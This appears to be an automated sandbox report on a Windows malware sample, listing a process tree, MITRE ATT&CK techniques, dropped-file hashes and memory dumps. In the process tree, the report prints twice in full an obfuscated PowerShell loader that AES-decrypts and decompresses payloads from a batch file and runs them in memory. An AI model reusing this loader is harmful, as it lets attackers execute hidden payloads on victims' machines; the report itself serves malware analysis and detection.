C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004C8
  2⤵
  PID:5076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1172

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2104

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2532

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2616
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /R /T
  2⤵
  - Drops file in System32 directory
  PID:1380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:808

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3080

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hand.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3120
- - C:\Windows\system32\cmd.exe
    cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Users\Admin\AppData\Local\Temp\hand.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));
    3⤵
    PID:4308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\hand.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
      4⤵
      Drops file in Windows directory
      PID:4724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
      4⤵
      PID:2380
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));
        5⤵
        
        PID:3692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3548

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4016

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4068

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:2560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2680

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1464

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2056

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4184

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:2252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:1420

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000110 0000008c
1⤵
PID:3152

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000104 0000008c
1⤵
PID:4800

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000e0 0000008c
1⤵
PID:3176

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000010c 0000008c
1⤵
PID:2904

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4884

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000114 0000008c
1⤵
PID:3440

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000104 0000008c
1⤵
PID:4064

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000f0 0000008c
1⤵
PID:4348

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000118 0000008c
1⤵
PID:4664

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000c0 0000008c
1⤵
PID:3692

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000100 0000008c
1⤵
PID:3504

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000138 0000008c
1⤵
PID:3504

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000104 0000008c
1⤵
PID:5060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
da760f8b53fcde92d67d6a610f0a4707

SHA1
8c75b58f43455329c26520540461832bb90bffeb

SHA256
1435d59e62d35d663ae54ca74cebd76a20b00380e3aa189b5d9567cdce7e7528

SHA512
90e62d0fe87dfc7810cbf864d6a984f2b4c24add105f18d375221d2e0f7637f7a1c2e34afe92dcbfccb5a435e8dd6c4ca87a9d79a0fff29bd79a0ac21846e3e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
aedb4691b4a410acfe415bdf5817c0d9

SHA1
acdbec00fdeb48253388f5fa7439e26cbfdebe7d

SHA256
cc4e216fe6e882b37196e3a34129e18d386c2541c6527297b84e0350b212cb42

SHA512
1712ac283dc4675ed270c62a0599302a2f3974e2668d1a6b04216b0819800b3e7bef124ba497767bd12c9f887ce34239eb4508a4220a6ba6e75393a370a8fc4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_luwja0bg.z15.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Filesize
7.0MB

MD5
1a013c7ac90b58073895b26cae70def7

SHA1
60c9c3294fc7ac3d336a478274f62f4818498230

SHA256
698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688

SHA512
c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75

Download Submit
memory/548-112-0x00007FFB5FFC6000-0x00007FFB5FFC7000-memory.dmp

Filesize
4KB

Download
memory/548-110-0x00007FFB5FFC4000-0x00007FFB5FFC5000-memory.dmp

Filesize
4KB

Download
memory/548-111-0x00007FFB5FFC3000-0x00007FFB5FFC4000-memory.dmp

Filesize
4KB

Download
memory/640-51-0x000002072A0B0000-0x000002072A0DA000-memory.dmp

Filesize
168KB

Download
memory/640-53-0x000002072A0B0000-0x000002072A0DA000-memory.dmp

Filesize
168KB

Download
memory/640-92-0x000002072A080000-0x000002072A0A4000-memory.dmp

Filesize
144KB

Download
memory/640-1330-0x000002072A080000-0x000002072A0A4000-memory.dmp

Filesize
144KB

Download
memory/640-37-0x000002072A080000-0x000002072A0A4000-memory.dmp

Filesize
144KB

Download
memory/640-39-0x000002072A0B0000-0x000002072A0DA000-memory.dmp

Filesize
168KB

Download
memory/640-38-0x000002072A0B0000-0x000002072A0DA000-memory.dmp

Filesize
168KB

Download
memory/640-47-0x000002072A0B0000-0x000002072A0DA000-memory.dmp

Filesize
168KB

Download
memory/640-48-0x000002072A0B0000-0x000002072A0DA000-memory.dmp

Filesize
168KB

Download
memory/640-49-0x000002072A0B0000-0x000002072A0DA000-memory.dmp

Filesize
168KB

Download
memory/640-50-0x000002072A0B0000-0x000002072A0DA000-memory.dmp

Filesize
168KB

Download
memory/640-52-0x00007FFB1FFB0000-0x00007FFB1FFC0000-memory.dmp

Filesize
64KB

Download
memory/696-58-0x000002899F5D0000-0x000002899F5FA000-memory.dmp

Filesize
168KB

Download
memory/696-67-0x000002899F5D0000-0x000002899F5FA000-memory.dmp

Filesize
168KB

Download
memory/696-65-0x000002899F5D0000-0x000002899F5FA000-memory.dmp

Filesize
168KB

Download
memory/696-66-0x000002899F5D0000-0x000002899F5FA000-memory.dmp

Filesize
168KB

Download
memory/696-68-0x000002899F5D0000-0x000002899F5FA000-memory.dmp

Filesize
168KB

Download
memory/696-69-0x000002899F5D0000-0x000002899F5FA000-memory.dmp

Filesize
168KB

Download
memory/696-1331-0x000002899F5A0000-0x000002899F5C4000-memory.dmp

Filesize
144KB

Download
memory/696-96-0x000002899F5A0000-0x000002899F5C4000-memory.dmp

Filesize
144KB

Download
memory/696-71-0x000002899F5D0000-0x000002899F5FA000-memory.dmp

Filesize
168KB

Download
memory/696-70-0x00007FFB1FFB0000-0x00007FFB1FFC0000-memory.dmp

Filesize
64KB

Download
memory/696-93-0x00007FFB5FFC4000-0x00007FFB5FFC5000-memory.dmp

Filesize
4KB

Download
memory/996-75-0x000001B603FD0000-0x000001B603FFA000-memory.dmp

Filesize
168KB

Download
memory/996-83-0x000001B603FD0000-0x000001B603FFA000-memory.dmp

Filesize
168KB

Download
memory/996-85-0x000001B603FD0000-0x000001B603FFA000-memory.dmp

Filesize
168KB

Download
memory/996-84-0x000001B603FD0000-0x000001B603FFA000-memory.dmp

Filesize
168KB

Download
memory/996-86-0x000001B603FD0000-0x000001B603FFA000-memory.dmp

Filesize
168KB

Download
memory/4800-12-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-18-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-15-0x000002517EC40000-0x000002517F086000-memory.dmp

Filesize
4.3MB

Download
memory/4800-91-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-13-0x000002517E5C0000-0x000002517E606000-memory.dmp

Filesize
280KB

Download
memory/4800-14-0x000002517E0D0000-0x000002517E10A000-memory.dmp

Filesize
232KB

Download
memory/4800-33-0x00000251382D0000-0x0000025138642000-memory.dmp

Filesize
3.4MB

Download
memory/4800-31-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-17-0x00007FFB5EB30000-0x00007FFB5EBED000-memory.dmp

Filesize
756KB

Download
memory/4800-24-0x00007FFB3F033000-0x00007FFB3F035000-memory.dmp

Filesize
8KB

Download
memory/4800-27-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-1319-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-9-0x000002517E500000-0x000002517E522000-memory.dmp

Filesize
136KB

Download
memory/4800-0-0x00007FFB3F033000-0x00007FFB3F035000-memory.dmp

Filesize
8KB

Download
memory/4800-16-0x00007FFB5FF20000-0x00007FFB60129000-memory.dmp

Filesize
2.0MB

Download
memory/4800-10-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-1054-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-11-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/4800-453-0x00007FFB3F030000-0x00007FFB3FAF2000-memory.dmp

Filesize
10.8MB

Download
memory/5008-32-0x00007FFB5FF20000-0x00007FFB60129000-memory.dmp

Filesize
2.0MB

Download
memory/5008-34-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5008-23-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5008-21-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5008-20-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5008-19-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5008-29-0x00007FFB5EB30000-0x00007FFB5EBED000-memory.dmp

Filesize
756KB

Download
memory/5008-1285-0x00007FFB5FF20000-0x00007FFB60129000-memory.dmp

Filesize
2.0MB

Download
memory/5008-1315-0x00007FFB5FF20000-0x00007FFB60129000-memory.dmp

Filesize
2.0MB

Download
memory/5008-28-0x00007FFB5FF20000-0x00007FFB60129000-memory.dmp

Filesize
2.0MB

Download
memory/5008-30-0x00007FFB5FF21000-0x00007FFB6004A000-memory.dmp

Filesize
1.2MB

Download
memory/5008-26-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download